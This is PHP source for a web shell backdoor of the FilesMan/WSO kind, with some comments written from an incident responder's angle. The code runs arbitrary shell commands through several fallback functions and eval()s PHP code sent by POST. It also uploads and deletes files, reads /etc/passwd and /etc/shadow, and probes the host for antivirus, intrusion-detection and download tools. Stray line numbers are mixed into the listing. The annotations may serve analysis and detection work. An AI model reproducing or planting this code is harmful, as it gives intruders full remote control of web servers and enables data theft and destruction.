    .main th    {text-align:left;}
    .main tr:hover{background-color:#5e5e5e;}
    .main td, th{vertical-align:middle;}
    pre            {font-family:Courier,Monospace;}
    #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
</style>
<script>
    function set(a,c,p1,p2,p3,charset) {
        if(a != null)document.mf.a.value=a;
        if(c != null)document.mf.c.value=c;
        if(p1 != null)document.mf.p1.value=p1;
        if(p2 != null)document.mf.p2.value=p2;
        if(p3 != null)document.mf.p3.value=p3;
        if(charset != null)document.mf.charset.value=charset;
    }
    function g(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        document.mf.submit();
    }
    function a(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        var params = "ajax=true";
        for(i=0;i<document.mf.elements.length;i++)
            params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
        sr('<?=$_SERVER['REQUEST_URI'];?>', params);
    }
    function sr(url, params) {
        if (window.XMLHttpRequest) {
            req = new XMLHttpRequest();
            req.onreadystatechange = processReqChange;
            req.open("POST", url, true);
            req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
            req.send(params);
        }
        else if (window.ActiveXObject) {
            req = new ActiveXObject("Microsoft.XMLHTTP");
            if (req) {
                req.onreadystatechange = processReqChange;
                req.open("POST", url, true);
                req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
                req.send(params);
            }
        }
    }
    function processReqChange() {
        if( (req.readyState == 4) )
            if(req.status == 200) {
                //alert(req.responseText);
                var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
                var arr=reg.exec(req.responseText);
                eval(arr[2].substr(0, arr[1]));
            }
            else alert("Request error!");
    }
</script>
<head><body><div style="position:absolute;width:100%;top:0;left:0;">
<form method=post name=mf style='display:none;'>
<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
<input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
<input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
<input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
</form>
<?php
    // Disk figures for the banner; a zero total is replaced by 1 to keep
    // the percentage division below safe.
    $freeSpace = @diskfreespace($GLOBALS['cwd']);
    $totalSpace = @disk_total_space($GLOBALS['cwd']);
    $totalSpace = $totalSpace?$totalSpace:1;
    $release = @php_uname('r');
    $kernel = @php_uname('s');
    // Exploit-search link (milw0rm.com is long defunct). Note the strpos()
    // arguments are reversed (haystack 'Linux', needle $kernel), so the first
    // branch only fires when $kernel is a substring of 'Linux'.
    $millink='http://milw0rm.com/search.php?dong=';
    if( strpos('Linux', $kernel) !== false )
        $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
    else
        $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
    // Effective identity: POSIX lookups when available, otherwise the
    // script owner via get_current_user()/getmyuid()/getmygid().
    if(!function_exists('posix_getegid')) {
        $user = @get_current_user();
        $uid = @getmyuid();
        $gid = @getmygid();
        $group = "?";
    } else {
        $uid = @posix_getpwuid(@posix_geteuid());
        $gid = @posix_getgrgid(@posix_getegid());
        $user = $uid['name'];
        $uid = $uid['uid'];
        $group = $gid['name'];
        $gid = $gid['gid'];
    }
    // Breadcrumb: one link per path segment, each opening FilesMan at the
    // prefix up to that segment.
    $cwd_links = '';
    $path = explode("/", $GLOBALS['cwd']);
    $n=count($path);
    for($i=0;$i<$n-1;$i++) {
        $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
        for($j=0;$j<=$i;$j++)
            $cwd_links .= $path[$j].'/';
        $cwd_links .= "\")'>".$path[$i]."/</a>";
    }
    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
    $opt_charsets = '';
    foreach($charsets as $item)
        $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
    // Menu: label => action name (dispatched as action<name>). Logout is
    // offered only when a password is configured.
    $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
    if(!empty($GLOBALS['auth_pass']))
    $m['Logout'] = 'Logout';
    $m['Self remove'] = 'SelfRemove';
    $menu = '';
    foreach($m as $k => $v)
        $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
    // Windows only: probe a: through z: for mounted drives.
    $drives = "";
    if ($GLOBALS['os'] == 'win') {
        foreach( range('a','z') as $drive )
        if (is_dir($drive.':\\')) 
            $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
    }
    // Banner table. The `<?=$color?>` inside the single-quoted PHP string is
    // emitted to the browser literally, not interpolated. "Server IP" is a
    // gethostbyname() of the client-supplied Host header, so every page
    // render performs a DNS lookup of whatever Host value was sent.
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd'.($GLOBALS['os'] == 'win'?'<br>Drives':'').'</span></td>'.
         '<td>:<nobr>'.substr(@php_uname(), 0, 120).'  <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a></nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=$color?><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>:'.$drives.'</td>'.
         '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
         '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
}
 268 
/**
 * Emits the page footer: a writability indicator for the current
 * directory and the toolbar of quick-action forms.
 *
 * Each form submits through g() into the hidden form `mf`: change dir
 * (c), read file (FilesTools, p1 = path), make dir (FilesMan, p1 =
 * 'mkdir', p2 = name), make file (FilesTools, p1 = name, p2 = 'mkfile')
 * and execute (Console, p1 = command line). The upload form is a
 * separate multipart POST with a = 'FilesMAn' and p1 = 'uploadFile'; the
 * differing case still resolves because PHP function names are
 * case-insensitive. For incident response, file uploads through this
 * shell therefore appear as multipart POSTs with those two hidden fields.
 */
function printFooter() {
    // Color-coded "[ Writeable ]" / "[ Not writable ]" tag for the cwd.
    $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
?>
</div>
<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
    <tr>
        <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
        <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
    </tr>
    <tr>
        <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
        <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
    </tr>
    <tr>
        <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
        <td><form method='post' ENCTYPE='multipart/form-data'>
        <input type=hidden name=a value='FilesMAn'>
        <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
        <input type=hidden name=p1 value='uploadFile'>
        <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
        <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
    </tr>

</table>
</div>
</body></html>
<?php
}
// Compatibility stubs: when the POSIX extension is absent, define
// posix_getpwuid()/posix_getgrgid() as functions that return false, but only
// if the name is not listed in disable_functions (presumably to avoid
// declaring a name PHP still treats as taken). With the stubs in place the
// identity lookups in printHeader() yield empty user/group names rather than
// failing.
if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
/**
 * Runs a command line through the platform shell and returns its output.
 *
 * Tries, in order, exec(), passthru(), system(), shell_exec() and popen();
 * the first primitive that exists (or, for popen(), returns a resource) is
 * used. exec() output lines are joined with "\n"; passthru()/system()
 * output is captured with output buffering; popen() is read in 1024-byte
 * chunks. The command is passed verbatim with no escaping, and failures
 * are @-suppressed. The hardening consequence is that disable_functions
 * must cover all five primitives (exec, passthru, system, shell_exec,
 * popen) before this helper stops returning output; blocking one or two
 * merely shifts execution to the next branch.
 *
 * @param string $in command line
 * @return string captured output ('' when no primitive is available)
 */
function ex($in) {
    $out = '';
    if(function_exists('exec')) {
        @exec($in,$out);
        $out = @join("\n",$out);
    }elseif(function_exists('passthru')) {
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    }elseif(function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
    }elseif(function_exists('shell_exec')) {
        $out = shell_exec($in);
    }elseif(is_resource($f = @popen($in,"r"))) {
        // popen() is not guarded by function_exists(); a false return
        // simply fails the is_resource() test.
        $out = "";
        while(!@feof($f))
            $out .= fread($f,1024);
        pclose($f);
    }
    return $out;
}
 322 function viewSize($s) { 
 323     if($s >= 1073741824) 
 324         return sprintf('%1.2f', $s / 1073741824 ). ' GB'; 
 325     elseif($s >= 1048576) 
 326         return sprintf('%1.2f', $s / 1048576 ) . ' MB'; 
 327     elseif($s >= 1024) 
 328         return sprintf('%1.2f', $s / 1024 ) . ' KB'; 
 329     else 
 330         return $s . ' B'; 
 331 } 
 332 
 333 function perms($p) { 
 334     if (($p & 0xC000) == 0xC000)$i = 's'; 
 335     elseif (($p & 0xA000) == 0xA000)$i = 'l'; 
 336     elseif (($p & 0x8000) == 0x8000)$i = '-'; 
 337     elseif (($p & 0x6000) == 0x6000)$i = 'b'; 
 338     elseif (($p & 0x4000) == 0x4000)$i = 'd'; 
 339     elseif (($p & 0x2000) == 0x2000)$i = 'c'; 
 340     elseif (($p & 0x1000) == 0x1000)$i = 'p'; 
 341     else $i = 'u'; 
 342     $i .= (($p & 0x0100) ? 'r' : '-'); 
 343     $i .= (($p & 0x0080) ? 'w' : '-'); 
 344     $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); 
 345     $i .= (($p & 0x0020) ? 'r' : '-'); 
 346     $i .= (($p & 0x0010) ? 'w' : '-'); 
 347     $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); 
 348     $i .= (($p & 0x0004) ? 'r' : '-'); 
 349     $i .= (($p & 0x0002) ? 'w' : '-'); 
 350     $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); 
 351     return $i; 
 352 } 
 353 function viewPermsColor($f) {  
 354     if (!@is_readable($f)) 
 355         return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>'; 
 356     elseif (!@is_writable($f)) 
 357         return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>'; 
 358     else 
 359         return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>'; 
 360 } 
// Fallback scandir() for very old builds that lack the native one. It differs
// from the builtin in ways that matter to the caller: entries come back in
// readdir order (unsorted), the handle is never closedir()'d, and when the
// directory is empty or opendir() fails $files is never initialised, so the
// function returns null rather than false — which the `=== false` check in
// actionFilesMan would not catch.
if(!function_exists("scandir")) {
    function scandir($dir) {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh))) {
            $files[] = $filename;
        }
        return $files;
    }
}
 370 function which($p) { 
 371     $path = ex('which '.$p); 
 372     if(!empty($path)) 
 373         return $path; 
 374     return false; 
 375 } 
/**
 * "Server security information" page: fingerprints the host from inside PHP.
 *
 * Prints interpreter hardening settings (disable_functions, open_basedir,
 * safe_mode dirs), the DB client extensions present, whether /etc/passwd and
 * /etc/shadow are readable, kernel/distro strings and, unless safe_mode is on,
 * which compilers, downloaders and host-security tools are on PATH (one
 * `which` shell call per name). On Windows it runs `ver`, `net accounts` and
 * `net user` instead.
 *
 * Defender note: the "Danger" list is the attacker's inventory of the AV /
 * IDS / integrity tools it wants to know about, and the PATH probe fires
 * dozens of short-lived `which` children from the web-server process in one
 * request — a usable process-tree detection signal.
 *
 * Reads globals set at the top of the file: disable_functions, os, safe_mode.
 * Writes HTML directly; returns nothing.
 */
function actionSecInfo() {
    printHeader();
    echo '<h1>Server security information</h1><div class=content>';
    // Local helper declared on first call. Values are emitted RAW (no HTML
    // escaping): one line for single-line values, <pre> for multi-line ones;
    // empty/whitespace-only values are skipped.
    function showSecParam($n, $v) {
        $v = trim($v);
        if($v) {
            echo '<span>'.$n.': </span>';
            if(strpos($v, "\n") === false)
                echo $v.'<br>';
            else
                echo '<pre class=ml1>'.$v.'</pre>';
        }
    }

    showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
    showSecParam('Open base dir', @ini_get('open_basedir'));
    showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
    showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
    showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
    // DB support is inferred purely from which client functions exist.
    $temp=array();
    if(function_exists('mysql_get_client_info'))
        $temp[] = "MySql (".mysql_get_client_info().")";
    if(function_exists('mssql_connect'))
        $temp[] = "MSSQL";
    if(function_exists('pg_connect'))
        $temp[] = "PostgreSQL";
    if(function_exists('oci_connect'))
        $temp[] = "Oracle";
    showSecParam('Supported databases', implode(', ', $temp));
    echo '<br>';

    if( $GLOBALS['os'] == 'nix' ) {
        // Three probe lists: build/scripting tools, host-security products
        // (the names are AV daemons, rootkit checkers, firewalls, IDS/HIDS and
        // log monitors), and anything that can fetch a second stage.
        $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
        $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
        $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
        showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
        // NOTE: unlike the passwd link above, this [view] link passes "etc"
        // (no leading or trailing slash) as the directory argument.
        showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
        showSecParam('OS version', @file_get_contents('/proc/version'));
        showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
        if(!$GLOBALS['safe_mode']) {
            echo '<br>';
            // Each which() is a separate shell execution via ex().
            $temp=array();
            foreach ($userful as $item)
                if(which($item)){$temp[]=$item;}
            showSecParam('Userful', implode(', ',$temp));
            $temp=array();
            foreach ($danger as $item)
                if(which($item)){$temp[]=$item;}
            showSecParam('Danger', implode(', ',$temp));
            $temp=array();
            foreach ($downloaders as $item)
                if(which($item)){$temp[]=$item;}
            showSecParam('Downloaders', implode(', ',$temp));
            echo '<br/>';
            showSecParam('Hosts', @file_get_contents('/etc/hosts'));
            showSecParam('HDD space', ex('df -h'));
            showSecParam('Mount options', @file_get_contents('/etc/fstab'));
        }
    } else {
        // Windows: three shell commands, output shown raw.
        showSecParam('OS Version',ex('ver'));
        showSecParam('Account Settings',ex('net accounts'));
        showSecParam('User Accounts',ex('net user'));
    }
    echo '</div>';
    printFooter();
}
 443 
/**
 * "Execution PHP-code" page: eval()s attacker-supplied PHP taken from POST p1.
 *
 * Two request shapes:
 *  - ajax set: eval p1, capture its output, and reply with a JS snippet
 *    (prefixed by its byte length and a newline) that drops the HTML-escaped
 *    output into #PhpOutput. The session 'ajax' flag is switched on so the
 *    checkbox stays checked on the next full render.
 *  - otherwise: a full page; p2=info additionally embeds a restyled
 *    phpinfo(); then the code textarea; then, if p1 is non-empty, eval p1
 *    with escaped output under it.
 *
 * Defender note: this is the arbitrary-code primitive of the shell — any
 * authenticated POST with a=Php and a p1 body is executed in the web server's
 * process with no further checks. Both paths run eval() on raw POST data.
 */
function actionPhp() {
    if( isset($_POST['ajax']) ) {
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        ob_start();
        eval($_POST['p1']);
        // Escape for HTML, then for a single-quoted JS string literal.
        $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'&#92;&#48;")."';\n";
        echo strlen($temp), "\n", $temp;
        exit;
    }
    printHeader();
    if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
        echo '<h1>PHP info</h1><div class=content>';
        ob_start();
        phpinfo();
        $tmp = ob_get_clean();
        // Strip phpinfo()'s own page-level CSS so it sits inside the shell's
        // theme, and demote its <h1> to <h2>.
        $tmp = preg_replace('!body {.*}!msiU','',$tmp);
        $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
        $tmp = preg_replace('!h1!msiU','h2',$tmp);
        $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
        $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
        echo $tmp;
        echo '</div><br>';
    }
    // Only the assignment below is the if-body; the echo that follows runs
    // unconditionally despite its indentation.
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
        echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
    echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
    if(!empty($_POST['p1'])) {
        // Non-AJAX eval of the posted code; output captured and escaped.
        ob_start();
        eval($_POST['p1']);
        echo htmlspecialchars(ob_get_clean());
    }
    echo '</pre></div>';
    printFooter();
}
 479 
/**
 * "File manager" page: applies the requested file operation, then lists the
 * current directory.
 *
 * POST protocol: p1 selects the operation (uploadFile, mkdir, delete, paste,
 * copy, move, or an s_<column>_<dir> sort key), p2 is the mkdir name, f[] the
 * url-encoded selection of names, c the directory. Copy/move are two-step:
 * the first request stashes the selection and its source dir in the session,
 * a later paste request applies it into the then-current directory.
 *
 * Defender notes grounded in this body:
 *  - uploads land under the client-supplied file name with no basename() or
 *    path check (move_uploaded_file, below);
 *  - every name in the listing is clickable through g(); directory paths and
 *    owner/group are emitted unescaped into the markup;
 *  - the hidden charset field reflects $_POST['charset'] unescaped.
 *
 * Reads $GLOBALS['cwd'] (presumably chdir()'d elsewhere from the posted c
 * field — TODO confirm in the dispatcher) and $_SESSION act/f/cwd.
 */
function actionFilesMan() {
    printHeader();
    echo '<h1>File manager</h1><div class=content>';
    if(isset($_POST['p1'])) {
        switch($_POST['p1']) {
            case 'uploadFile':
                // Destination is the original upload name, relative to the
                // process's current directory; failures are silent apart
                // from this message.
                if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
                    echo "Can't upload file!";
                break;
                // unreachable second break (copy/paste artefact)
                break;
            case 'mkdir':
                if(!@mkdir($_POST['p2']))
                    echo "Can't create new dir";
                break;
            case 'delete':
                // Recursive delete: walks the tree, unlinks files
                // (errors suppressed), then removes the directory itself.
                function deleteDir($path) {
                    $path = (substr($path,-1)=='/') ? $path:$path.'/';
                    $dh  = opendir($path);
                    while ( ($item = readdir($dh) ) !== false) {
                        $item = $path.$item;
                        if ( (basename($item) == "..") || (basename($item) == ".") )
                            continue;
                        $type = filetype($item);
                        if ($type == "dir")
                            deleteDir($item);
                        else
                            @unlink($item);
                    }
                    closedir($dh);
                    rmdir($path);
                }
                // Names arrive url-encoded (see the checkbox values below).
                if(is_array(@$_POST['f']))
                    foreach($_POST['f'] as $f) {
                        $f = urldecode($f);
                        if(is_dir($f))
                            deleteDir($f);
                        else
                            @unlink($f);
                    }
                break;
            case 'paste':
                if($_SESSION['act'] == 'copy') {
                    // Recursive copy of $c.$s into $d.$s; mkdir/copy errors
                    // are ignored and the dir handle is never closed.
                    function copy_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = opendir($c.$s);
                            while (($f = readdir($h)) !== false)
                                if (($f != ".") and ($f != "..")) {
                                    copy_paste($c.$s.'/',$f, $d.$s.'/');
                                }
                        } elseif(is_file($c.$s)) {
                            @copy($c.$s, $d.$s);
                        }
                    }
                    foreach($_SESSION['f'] as $f)
                        copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
                } elseif($_SESSION['act'] == 'move') {
                    // Declared but never called: the move branch below uses
                    // rename() directly. Its body also recurses into
                    // copy_paste(), which is only defined in the copy branch.
                    function move_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = opendir($c.$s);
                            while (($f = readdir($h)) !== false)
                                if (($f != ".") and ($f != "..")) {
                                    copy_paste($c.$s.'/',$f, $d.$s.'/');
                                }
                        } elseif(is_file($c.$s)) {
                            @copy($c.$s, $d.$s);
                        }
                    }
                    foreach($_SESSION['f'] as $f)
                        @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
                }
                unset($_SESSION['f']);
                break;
            default:
                // First half of copy/move: remember the selection and the
                // directory it came from until a paste request arrives.
                if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
                    $_SESSION['act'] = @$_POST['p1'];
                    $_SESSION['f'] = @$_POST['f'];
                    foreach($_SESSION['f'] as $k => $f)
                        $_SESSION['f'][$k] = urldecode($f);
                    $_SESSION['cwd'] = @$_POST['c'];
                }
                break;
        }
        echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
    }
    // Listing is read from the posted c when present, but every stat below
    // is built from $GLOBALS['cwd'] — the two are assumed to agree.
    $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
    if($dirContent === false) {    echo 'Can\'t open this folder!'; return;    }
    // Sort spec: column name and direction flag, overridable via p1=s_<col>_<0|1>.
    global $sort;
    $sort = array('name', 1);
    if(!empty($_POST['p1'])) {
        if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
            $sort = array($match[1], (int)$match[2]);
    }
?>
<script>
    function sa() {
        for(i=0;i<document.files.elements.length;i++)
            if(document.files.elements[i].type == 'checkbox')
                document.files.elements[i].checked = document.files.elements[0].checked;
    }
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post>
<?php
    echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
    $dirs = $files = $links = array();
    $n = count($dirContent);
    for($i=0;$i<$n;$i++) {
        // Owner/group lookups use the bare name (relative to the process
        // cwd) while everything else uses the cwd-prefixed path.
        $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
        $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
        $tmp = array('name' => $dirContent[$i],
                     'path' => $GLOBALS['cwd'].$dirContent[$i],
                     'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
                     'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
                     'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
                     'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
                     'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
                    );
        // Bucket into dirs / links / files; "." is dropped, ".." kept.
        if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
            $files[] = array_merge($tmp, array('type' => 'file'));
        elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
            $links[] = array_merge($tmp, array('type' => 'link'));
        elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
            $dirs[] = array_merge($tmp, array('type' => 'dir'));
    }
    $GLOBALS['sort'] = $sort;
    // Comparator reads the sort spec from $GLOBALS; string compare for every
    // column except size, which is compared numerically.
    function cmp($a, $b) {
        if($GLOBALS['sort'][0] != 'size')
            return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
        else
            return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
    }
    usort($files, "cmp");
    usort($dirs, "cmp");
    usort($links, "cmp");
    $files = array_merge($dirs, $links, $files);
    $l = 0;
    // One row per entry. Names are HTML-escaped (and url-encoded inside the
    // g() calls), but $f['path'], owner and group are emitted raw.
    foreach($files as $f) {
        echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
            .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
        $l = $l?0:1;
    }
    // Bulk-action footer; the charset field below reflects $_POST['charset']
    // without escaping.
    ?>
    <tr><td colspan=7>
    <input type=hidden name=a value='FilesMan'>
    <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
    <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
    <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select>&nbsp;<input type="submit" value=">>"></td></tr>
    </form></table></div>
    <?php
    printFooter();
}
 633 
/**
 * "String conversions" page plus a form that submits a hash to third-party
 * lookup sites.
 *
 * The conversion is performed server-side as `$_POST['p1']($_POST['p2'])`:
 * p1 is a function NAME and p2 its single argument. The menu offers only the
 * string helpers in $stringTools, but that list exists client-side only —
 * the server's sole check is function_exists(), so any defined one-argument
 * function can be invoked this way. Treat a=StringTools requests as a
 * second code-execution path, not just a utility.
 *
